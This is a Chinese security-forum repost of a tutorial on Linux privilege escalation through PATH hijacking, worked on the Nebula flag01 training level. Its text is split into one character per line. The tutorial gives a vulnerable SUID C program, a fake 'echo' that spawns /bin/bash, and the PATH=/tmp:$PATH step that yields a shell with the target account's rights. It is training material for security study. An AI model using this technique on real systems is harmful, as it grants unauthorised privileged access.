论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[21510] 2020-12-17_环境变量法提权
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-18
渗透测试
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-12-17_环境变量法提权
环
境
变
量
法
提
权
L
e
m
o
n
S
e
c
2
0
2
0
-
1
2
-
1
7
作
者
:
隐
念
笎
有
些
应
用
程
序
使
用
了
s
y
s
t
e
m
等
函
数
调
用
了
系
统
命
令
,
但
是
没
有
使
用
绝
对
路
径
而
是
使
用
e
n
v
命
令
从
环
境
变
量
中
进
行
查
找
,
这
就
可
能
通
过
修
改
环
境
变
量
来
进
行
权
限
提
升
看
下
面
的
例
子
,
本
例
来
自
于
n
e
b
u
l
a
:
f
l
a
g
0
1
程
序
通
过
e
n
v
命
令
执
行
了
e
c
h
o
命
令
1
、
创
建
自
己
的
e
c
h
o
命
令
,
保
存
在
/
t
m
p
目
录
下
2
、
查
看
下
当
前
的
环
境
变
量
/
/
f
l
a
g
0
1
.
c
#
i
n
c
l
u
d
e
<
s
t
d
l
i
b
.
h
>
#
i
n
c
l
u
d
e
<
u
n
i
s
t
d
.
h
>
#
i
n
c
l
u
d
e
<
s
t
r
i
n
g
.
h
>
#
i
n
c
l
u
d
e
<
s
y
s
/
t
y
p
e
s
.
h
>
#
i
n
c
l
u
d
e
<
s
t
d
i
o
.
h
>
i
n
t
m
a
i
n
(
i
n
t
a
r
g
c
,
c
h
a
r
*
*
a
r
g
v
,
c
h
a
r
*
*
e
n
v
p
)
{
g
i
d
_
t
g
i
d
;
u
i
d
_
t
u
i
d
;
g
i
d
=
g
e
t
e
g
i
d
(
)
;
u
i
d
=
g
e
t
e
u
i
d
(
)
;
s
e
t
r
e
s
g
i
d
(
g
i
d
,
g
i
d
,
g
i
d
)
;
s
e
t
r
e
s
u
i
d
(
u
i
d
,
u
i
d
,
u
i
d
)
;
s
y
s
t
e
m
(
"
/
u
s
r
/
b
i
n
/
e
n
v
e
c
h
o
a
n
d
n
o
w
w
h
a
t
?
"
)
;
}
/
/
编
译
后
得
到
f
l
a
g
0
1
程
序
,
这
个
程
序
具
有
s
u
i
d
权
限
/
/
e
c
h
o
.
c
#
i
n
c
l
u
d
e
<
s
t
d
l
i
b
.
h
>
#
i
n
c
l
u
d
e
<
u
n
i
s
t
d
.
h
>
#
i
n
c
l
u
d
e
<
s
t
r
i
n
g
.
h
>
#
i
n
c
l
u
d
e
<
s
y
s
/
t
y
p
e
s
.
h
>
#
i
n
c
l
u
d
e
<
s
t
d
i
o
.
h
>
i
n
t
m
a
i
n
(
i
n
t
a
r
g
c
,
c
h
a
r
*
*
a
r
g
v
,
c
h
a
r
*
*
e
n
v
p
)
{
s
y
s
t
e
m
(
"
/
b
i
n
/
b
a
s
h
"
)
;
}
l
e
v
e
l
0
1
@
n
e
b
u
l
a
:
/
t
m
p
$
/
/
g
c
c
-
o
e
c
h
o
e
c
h
o
.
c
l
e
v
e
l
0
1
@
n
e
b
u
l
a
:
/
h
o
m
e
/
f
l
a
g
0
1
$
e
n
v
T
E
R
M
=
x
t
e
r
m
-
2
5
6
c
o
l
o
r
S
H
E
L
L
=
/
b
i
n
/
s
h
S
S
H
_
C
L
I
E
N
T
=
1
9
2
.
1
6
8
.
1
0
9
.
2
1
6
5
2
0
4
4
2
2
O
L
D
P
W
D
=
/
h
o
m
e
S
S
H
_
T
T
Y
=
/
d
e
v
/
p
t
s
/
0
U
S
E
R
=
l
e
v
e
l
0
1
L
S
_
C
O
L
O
R
S
=
r
s
=
0
:
d
i
=
0
1
;
3
4
:
l
n
=
0
1
;
3
6
:
m
h
=
0
0
:
p
i
=
4
0
;
3
3
:
s
o
=
0
1
;
3
5
:
d
o
=
0
1
;
3
5
:
b
d
=
4
0
;
3
3
;
0
1
:
c
d
=
4
0
;
3
3
;
0
1
:
o
r
=
4
0
;
3
1
;
0
1
:
s
u
=
3
7
;
4
1
:
s
g
=
3
0
;
4
3
:
c
a
=
3
0
;
4
1
:
t
w
=
3
0
;
4
2
:
o
w
=
3
4
;
4
2
:
s
t
=
3
7
;
4
4
:
e
x
=
0
1
;
3
2
:
*
.
t
a
r
=
0
1
;
3
1
:
*
M
A
I
L
=
/
v
a
r
/
m
a
i
l
/
l
e
v
e
l
0
1
P
A
T
H
=
/
u
s
r
/
l
o
c
a
l
/
s
b
i
n
:
/
u
s
r
/
l
o
c
a
l
/
b
i
n
:
/
u
s
r
/
s
b
i
n
:
/
u
s
r
/
b
i
n
:
/
s
b
i
n
:
/
b
i
n
:
/
u
s
r
/
g
a
m
e
s
P
W
D
=
/
h
o
m
e
/
f
l
a
g
0
1
L
A
N
G
=
e
n
_
U
S
.
U
T
F
-
8
S
H
L
V
L
=
1
H
O
M
E
=
/
h
o
m
e
/
l
e
v
e
l
0
1
L
A
N
G
U
A
G
E
=
e
n
_
U
S
:
L
O
G
N
A
M
E
=
l
e
v
e
l
0
1
S
S
H
_
C
O
N
N
E
C
T
I
O
N
=
1
9
2
.
1
6
8
.
1
0
9
.
2
1
6
5
2
0
4
4
1
9
2
.
1
6
8
.
1
0
9
.
1
9
6
2
2
L
E
S
S
O
P
E
N
=
|
/
u
s
r
/
b
i
n
/
l
e
s
s
p
i
p
e
%
s
L
E
S
S
C
L
O
S
E
=
/
u
s
r
/
b
i
n
/
l
e
s
s
p
i
p
e
%
s
%
s
_
=
/
u
s
r
/
b
i
n
/
e
n
v
l
e
v
e
l
0
1
@
n
e
b
u
l
a
:
/
h
o
m
e
/
f
l
a
g
0
1
$
运
行
一
下
命
令
将
/
t
m
p
目
录
加
入
P
A
T
H
变
量
的
最
前
面
,
是
的
e
n
v
命
令
首
先
执
行
我
们
自
己
的
e
c
h
o
命
令
3
、
执
行
f
l
a
g
0
1
程
序
,
由
于
f
l
a
g
0
1
程
序
具
有
s
u
i
d
位
,
所
以
f
l
a
g
0
1
会
以
自
身
权
限
执
行
/
t
m
p
/
e
c
h
o
命
令
。
/
t
m
p
/
e
c
h
o
又
以
f
l
a
g
0
1
的
权
限
执
行
了
/
b
i
n
/
b
a
s
h
命
令
因
此
我
们
得
到
了
一
个
f
l
a
g
0
1
权
限
的
s
h
e
l
l
一
如
既
往
的
学
习
,
一
如
既
往
的
整
理
,
一
如
即
往
的
分
享
。
感
谢
支
持
“
如
侵
权
请
私
聊
公
众
号
删
文
”
扫
描
关
注
扫
描
关
注
L
e
m
o
n
S
e
c
觉
得
不
错
点
个
觉
得
不
错
点
个
“
赞
赞
”
、
、
“
在
看
在
看
”
哦
哦
l
e
v
e
l
0
1
@
n
e
b
u
l
a
:
/
h
o
m
e
/
f
l
a
g
0
1
$
l
e
v
e
l
0
1
@
n
e
b
u
l
a
:
/
t
m
p
$
P
A
T
H
=
/
t
m
p
:
$
P
A
T
H
原
文
链
接
:
h
t
t
p
s
:
/
/
w
w
w
.
c
n
b
l
o
g
s
.
c
o
m
/
z
l
g
x
z
s
w
j
y
/
p
/
1
0
3
7
3
8
0
8
.
h
t
m
l
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
浏览过的版块
云安全
发表
渗透测试